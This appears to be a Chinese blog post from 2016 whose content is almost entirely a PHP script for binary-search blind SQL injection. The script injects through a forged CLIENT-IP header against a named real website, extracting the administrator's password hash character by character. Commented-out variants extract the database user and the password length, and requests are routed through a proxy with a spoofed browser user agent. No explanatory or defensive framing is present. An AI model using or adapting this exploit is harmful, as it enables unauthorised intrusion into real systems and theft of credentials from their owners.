MENU

二分法盲注实例

March 6, 2016 • Security

<?php

//$sCharset = 'etaoinshrdlcumwfgypbvkjxqz@';
 $sCharset ='ABCDEF0123456789';

/* for every character */
for ($i=0, $result=''; $i<32; ++$i) {
        $ch = $sCharset;

        do {
                $ch1 = substr($ch, 0, intval(strlen($ch)/2));
                $ch2 = substr($ch, intval(strlen($ch)/2));

                //$p = $sPost.' OR 1=(SELECT 1 FROM blight WHERE password REGEXP \'^'.$result.'['.$ch1.']\' AND sessid=xxx) AND \'1\'=\'1';
                 //$payload= "AND ORD(mid(lower(user()),$i,1))= ".ord($p);
                //$p='or 1=(select CURRENT_USER()  REGEXP \'^'.$result.'['.$ch1.']\') and 1=1';
                //201.56.23.45' AND ORD(MID((SELECT HEX(IFNULL(CAST(CHAR_LENGTH(HEX(IFNULL(CAST(password AS CHAR),0x20))) AS CHAR),0x20)) FROM phfirst.`system_user` ORDER BY `user` LIMIT 2,1),4,1))>50#
                //$p='or 1=(select `password`  FROM phfirst.`system_user`  where user=\'admin\' and hex(`password`) REGEXP \'^'.$result.'['.$ch1.']\') and 1=1';
                $p='or 1=(select case when (select hex(password) from phfirst.`system_user` where user=\'admin\')'  .'REGEXP \'^'.$result.'['.$ch1.']\'' .'THEN 1 ELSE 0 end) and 1=1';

                //echo $p.PHP_EOL;
                $res = mycurl('http://www.phfirst.com.tw/mrtg.php',$p);

                if (strpos($res, 'mysql_fetch_array') === false)
                        $ch = $ch1;
                else
                        $ch = $ch2;

        } while (strlen($ch) > 1);
         
        $result .= $ch;
       echo "\rresult: ".$result;
}
 

/* 获取长度
$payload= " And (select length(user()))=14 ";
    $contents= mycurl('http://www.phfirst.com.tw/mrtg.php',$payload);
echo    $contents;
*/
function mycurl($url,$str){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url) ;  
curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0');
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-Requested-With: XMLHttpRequest','CLIENT-IP: 201.56.23.45\''.' '.$str.'#'));//构造IP  
//curl_setopt($ch, CURLOPT_PROXY,'127.0.0.1:8081');
curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8081');  //http代理
//curl_setopt($ch, CURLOPT_PROXY, 'socks5://127.0.0.1:1080');  //socks5代理
//curl_setopt($ch, CURLOPT_PROXYTYPE,'CURLPROXY_HTTP');
curl_setopt($ch,CURLOPT_DNS_CACHE_TIMEOUT,86400); //DNS 缓存一天
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);//字符串的形式返回
//curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);//是否302跳转
curl_setopt($ch,CURLOPT_TIMEOUT,10);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,15);
$ret = curl_exec($ch);
curl_close($ch);
return $ret;
}
Archives QR Code
QR Code for this page
Tipping QR Code